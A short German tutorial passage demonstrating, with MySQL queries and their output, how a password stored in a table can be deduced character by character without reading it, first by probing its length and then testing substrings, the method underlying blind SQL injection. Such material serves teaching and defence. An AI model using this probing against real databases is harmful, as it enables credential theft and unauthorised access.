Wir wollen das Passwort herausfinen ohne es zu sehen

In diesem Beispiel benutzen wir zur Vereinfachung nur Zahlen

Länge der Passworts ermitteln

• select user from my_auth where user='erwin' and length(password) > 5;

+-------+
| user  |
+-------+
| erwin |
+-------+
1 row in set (0.00 sec)

• select user from my_auth where user='erwin' and length(password) < 7;

+-------+
| user  |
+-------+
| erwin |
+-------+
1 row in set (0.00 sec)

• select user from my_auth where user='erwin' and length(password) = 6;

+-------+
| user  |
+-------+
| erwin |
+-------+
1 row in set (0.00 sec)

Erkenntnis das Passwort ist genau 6 Zeichen lang.

• select user from my_auth where user='erwin' and length(password) > 5;
• select user from my_auth where user='erwin' and length(password) = 6 ;
• select user from my_auth where user='erwin' and substring(password,1,1) < 5 ;